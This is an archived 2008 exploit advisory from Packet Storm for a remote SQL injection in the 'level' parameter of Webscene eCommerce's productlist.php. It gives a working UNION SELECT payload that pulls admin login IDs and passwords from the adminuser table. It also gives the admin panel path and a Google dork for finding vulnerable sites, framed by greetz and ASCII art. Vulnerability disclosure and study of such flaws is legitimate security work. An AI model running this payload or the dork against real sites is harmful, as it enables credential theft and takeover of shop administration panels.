webscene-sql.txt

2008-10-14T00:00:00
ID PACKETSTORM:70913
Type packetstorm
Reporter Angela Chang
Modified 2008-10-14T00:00:00

Description

                                        
                                            `#################################################################################  
#  
# Webscene eCommerce (level) Remote Sql Injection  
#  
# vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm  
#  
#################################################################################  
#  
#  
# Bug Found By :Angela Chang (14-10-2008)  
#  
# contact: angel[at]ch4ng.cc  
#  
#  
################################################################################  
#  
#  
# Greetz: nyubi & Vrs-Chk  
#  
#  
###############################################################################  
  
vuln file : productlist.php  
  
Input passed to the "level" is not properly verified  
before being used. This can be exploited to execute  
remote sql injection.  
  
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]  
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--  
  
Login admin : http://somehost/admin/  
  
  
Google dork : inurl:productlist.php?categoryid= level  
  
########################################################################  
__ _ _ _ __ _   
__ _ _ _ / _` | ___ | | __ _ o O O __ | |_ __ _ _ _ / _` |   
/ _` | | ' \ \__, | / -_) | | / _` | o / _| | ' \ / _` | | ' \ \__, |   
\__,_| |_||_| |___/ \___| _|_|_ \__,_| TS__[O] \__|_ |_||_| \__,_| |_||_| |___/   
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|   
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'   
`